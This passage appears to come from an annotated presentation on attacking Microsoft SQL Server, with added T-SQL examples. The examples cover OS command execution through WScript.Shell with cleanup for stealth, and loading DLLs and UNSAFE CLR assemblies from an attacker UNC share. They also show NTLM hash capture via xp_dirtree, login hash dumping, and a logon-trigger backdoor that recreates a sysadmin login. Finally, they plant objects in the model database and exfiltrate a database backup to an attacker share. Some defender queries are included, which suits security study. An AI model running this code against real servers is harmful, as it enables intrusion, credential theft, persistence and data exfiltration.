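WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'SQL Mail XPs');

-- Step 2: create a WScript.Shell object. A non-zero HRESULT here with the option
-- enabled usually means the COM class itself is blocked (slide 42: procedure
-- access allowed, object access not); sp_OAGetErrorInfo says why.
DECLARE @shell INT, @hr INT, @src NVARCHAR(255), @desc NVARCHAR(255);
DECLARE @out NVARCHAR(260), @cmd NVARCHAR(1000), @rc INT, @bulk NVARCHAR(1000);

EXEC @hr = sp_OACreate 'WScript.Shell', @shell OUTPUT;
IF @hr <> 0
BEGIN
    EXEC sp_OAGetErrorInfo @shell, @src OUTPUT, @desc OUTPUT;
    RAISERROR('sp_OACreate failed: %s / %s', 16, 1, @src, @desc);
    RETURN;
END;

-- Step 3: stage the output file in the service account's own %TEMP% (Note 6);
-- WScript.Shell expands the variable for us, so we never hard-code a path.
EXEC sp_OAMethod @shell, 'ExpandEnvironmentStrings', @out OUTPUT, '%TEMP%\out.txt';
SET @cmd = N'cmd.exe /c whoami /all > "' + @out + N'" 2>&1';   -- demo payload

-- Run(command, windowStyle = 0 hidden, waitOnReturn = 1) so the file is complete
-- before we read it; the return value is the process exit code.
EXEC sp_OAMethod @shell, 'Run', @rc OUTPUT, @cmd, 0, 1;
EXEC sp_OADestroy @shell;

-- Step 4: read the file without any scripting (slide 43). With a single-column
-- target table the only delimiter that matters is the row terminator, so each
-- line becomes one row. The path must be inlined, hence dynamic SQL.
-- Caveat: under a Windows login BULK INSERT opens the file as that login, under
-- SQL authentication as the service account; the file ACL can make it fail.
CREATE TABLE #out (line NVARCHAR(4000));
SET @bulk = N'BULK INSERT #out FROM ''' + @out + N''' WITH (ROWTERMINATOR = ''\n'')';
EXEC (@bulk);
SELECT line FROM #out;

-- Step 5: remove the artefact on disk (Note 8: minimal footprint).
EXEC sp_OACreate 'Scripting.FileSystemObject', @shell OUTPUT;
EXEC sp_OAMethod @shell, 'DeleteFile', NULL, @out;
EXEC sp_OADestroy @shell;
```

The same BULK INSERT pattern reads any file the relevant account can open, which is the slide's point: the scripting objects are only needed for writing or executing, not for reading.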
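Slides 53 and 54 and Editor's Notes 4, 14 and 15 in T-SQL, as an added example that is not from the presentation. The share \\attacker\share, the DLL names, xp_evil, EvilAsm and the class/method in EXTERNAL NAME are all placeholders, and sysadmin is assumed throughout.

```sql
-- Added example (editor-supplied, not from the slides): the compiled-code
-- loading paths of slides 53-54, each pointed at a UNC path, plus the quieter
-- UNC trick from Editor's Note 4. Placeholders: \\attacker\share, evil.dll,
-- evil_clr.dll, xp_evil, EvilAsm, Payload.Run.

-- 1. Extended stored procedure loaded from a share. The DLL is mapped straight
--    into sqlservr.exe and runs as the service account (System/admin per slide 11).
--    An NTFS alternate data stream is accepted in the same place, e.g.
--    'C:\Windows\Temp\notes.txt:evil.dll'.
EXEC sp_addextendedproc 'xp_evil', '\\attacker\share\evil.dll';
EXEC master..xp_evil;
EXEC sp_dropextendedproc 'xp_evil';
-- Dropping the procedure does not unload the DLL; that takes DBCC evil (FREE)
-- or a service restart, so the image stays resident (and findable) until then.

-- 2. CLR assembly from a share (CREATE ASSEMBLY takes UNC paths too, Note 4).
--    UNSAFE needs 'clr enabled' plus either a TRUSTWORTHY database owned by a
--    login holding UNSAFE ASSEMBLY, or a signed assembly. msdb is TRUSTWORTHY
--    and owned by sa out of the box, which is why it is the usual landing spot.
--    SQL Server 2017 and later add 'clr strict security', which also demands
--    a signed assembly unless that option is turned off.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'clr enabled', 1;           RECONFIGURE;
USE msdb;
CREATE ASSEMBLY EvilAsm
    FROM '\\attacker\share\evil_clr.dll'
    WITH PERMISSION_SET = UNSAFE;
-- The bytes are now stored inside msdb; the share is no longer needed.
-- Hypothetical entry point: static method Run(SqlString) on class Payload.
CREATE PROCEDURE dbo.xp_run_evil @arg NVARCHAR(4000)
    AS EXTERNAL NAME EvilAsm.Payload.Run;
EXEC dbo.xp_run_evil N'whoami';

-- 3. The quieter use of a UNC parameter (Note 4): a procedure that merely touches
--    a path makes the service account authenticate to that host over SMB, so a
--    listener on the share receives the account's NTLM challenge/response without
--    any code being loaded. xp_dirtree has historically been executable by public.
EXEC master..xp_dirtree   '\\attacker\share\', 1, 1;
EXEC master..xp_fileexist '\\attacker\share\probe.txt';
EXEC master..xp_subdirs   '\\attacker\share\';

-- Defender side: user-supplied ex-sprocs and assemblies are trivial to enumerate,
-- and a dll_name or assembly source that is a UNC path is a red flag on its own.
SELECT name, dll_name FROM master.sys.extended_procedures;
SELECT name, permission_set_desc, create_date
FROM sys.assemblies WHERE is_user_defined = 1;
```

Outbound SMB from the SQL host to anything but known file servers is the network-level check for item 3; the engine-level checks at the bottom cover items 1 and 2.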

Editor's Notes

  1. Luckily, or unfortunately (point of view), this is still the case and all too common.
  2. Luckily, or unfortunately (point of view), this is still the case and all too common.
  3. Luckily, or unfortunately (point of view), this is still the case and all too common.
  4. DBAs are always told to disable these extended stored procedures, but it's not always covered why they're so bad. The dirtree, fileexist, and subdirs ex-sprocs can be a lot more devastating (useful) than one might think. Even the sp's (rather than ex-sp's) can pose a significant risk as well if they accept a UNC path as a parameter. A lot of these have been ACL'd away from normal users by default, but xp_fileexist made its way into MS-SQL 2k8. CREATE ASSEMBLY also allows UNC paths; it's not an extended sproc, but worth mentioning here.
  5. A lot of pentesters and attackers assume that xp_cmdshell isn't available because commands don't execute; they're further confused when a call to sp_addextendedproc doesn't work. xp_cmdshell needs to be enabled.
  6. Using the sp_OACreate, sp_OAMethod, and sp_OADestroy methods the same functionality as xp_cmdshell can be accomplished. Unfortunately results of a command execution aren't directly accessible and must go to temporary storage (a file on disk). Luckily, since it's being used in a scripting environment, we can access the %TEMP% and %SYSTEM% environment variables to help stage temp storage directories and other valuable information.
  7. No sense in going through all the trouble of scripting a file read when you can have SQL do all the work.
  8. Minimal footprints on the system is always better for stealth.
  9. Fail #1
  10. Fail #2 – but this looks interesting.
  11. Now we’re in business.
  12. The limited documentation and examples available on the sp_OA methods usually only cover Wscript, the system is full of other fun controls.
  13. If you can access WScript to execute shell commands, why stop there? If you have expanded access on the host, you can always register your own controls for use by the sp_OA methods.
  14. SQL facilitates 2 existing methods that will load and execute compiled code.
  15. All of the typical path fun for files works from inside SQL.
  16. Repurpose the platform to facilitate your foothold into an environment. Everything an attacker would need is available in SQL, and if you operate entirely in the environment you leave a minimal footprint on the actual host.
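Slide 56's persistence list and Editor's Note 16 written out in T-SQL, as an added example that is not from the presentation, with the catalog query a defender would run against each item. backdoor_svc, usp_health, TargetDB, the password and the UNC path are placeholders; sysadmin is assumed.

```sql
-- Added example (editor-supplied, not from the slides): slide 56 and Editor's
-- Note 16 as T-SQL, each item followed by the defender's query for it.
-- Placeholders: backdoor_svc, usp_health, TargetDB, the password, \\attacker\share.

-- ALWAYS dump the SQL passwords: hashes of SQL-authenticated logins for offline
-- cracking (2005 and later; SQL 2000 kept them in master..sysxlogins).
SELECT name, password_hash, is_disabled, create_date
FROM sys.sql_logins;
GO

-- Triggers: a server-scoped logon trigger fires on every connection and runs as
-- the login it impersonates. This one re-creates a sysadmin login whenever it is
-- missing. Any error in a logon trigger denies *all* logins; recovery is through
-- the Dedicated Admin Connection (sqlcmd -A), on which logon triggers do not fire.
CREATE TRIGGER tr_persist ON ALL SERVER
WITH EXECUTE AS 'sa'
FOR LOGON
AS
BEGIN
    IF NOT EXISTS (SELECT 1 FROM sys.server_principals WHERE name = N'backdoor_svc')
    BEGIN
        CREATE LOGIN backdoor_svc WITH PASSWORD = N'Placeh0lder!', CHECK_POLICY = OFF;
        EXEC sp_addsrvrolemember 'backdoor_svc', 'sysadmin';
    END
END;
GO

-- Spiking the model database: model is the template for CREATE DATABASE, so an
-- object planted here is cloned into every database created afterwards.
USE model;
GO
CREATE PROCEDURE dbo.usp_health
WITH EXECUTE AS OWNER
AS
    -- placeholder payload: whatever should reappear in each new database
    SELECT SUSER_SNAME() AS running_as, DB_NAME() AS db;
GO

-- Guest account: enabling guest in a user database gives every login on the
-- instance a way in without a mapped database user for anyone to audit.
USE TargetDB;
GRANT CONNECT TO guest;
GRANT SELECT ON SCHEMA::dbo TO guest;
GO

-- Data copying and backup permissioning: BACKUP writes as the service account,
-- so a share it can reach is a one-statement copy of the whole database.
-- COPY_ONLY keeps the backup out of the differential/log chain, so the real
-- backup jobs do not notice anything.
BACKUP DATABASE TargetDB
    TO DISK = '\\attacker\share\TargetDB.bak'
    WITH COPY_ONLY, INIT;
GO

-- Defender side: each of the above leaves a row in a catalog view.
SELECT name, is_disabled, create_date FROM sys.server_triggers;      -- logon/DDL triggers
SELECT name, type_desc, create_date
FROM model.sys.objects WHERE is_ms_shipped = 0;                      -- anything planted in model
SELECT p.permission_name, p.state_desc                               -- run inside each user DB
FROM sys.database_permissions p
JOIN sys.database_principals u ON u.principal_id = p.grantee_principal_id
WHERE u.name = 'guest' AND p.permission_name = 'CONNECT';
SELECT s.database_name, f.physical_device_name, s.backup_finish_date
FROM msdb.dbo.backupset s
JOIN msdb.dbo.backupmediafamily f ON f.media_set_id = s.media_set_id
WHERE f.physical_device_name LIKE '\\%';                             -- backups sent to a UNC path
```

None of this touches the host file system except the backup, which is why slide 9's "adding accounts, not too stealthy" still applies: the trigger keeps the login alive, but the login itself is one SELECT away from being found.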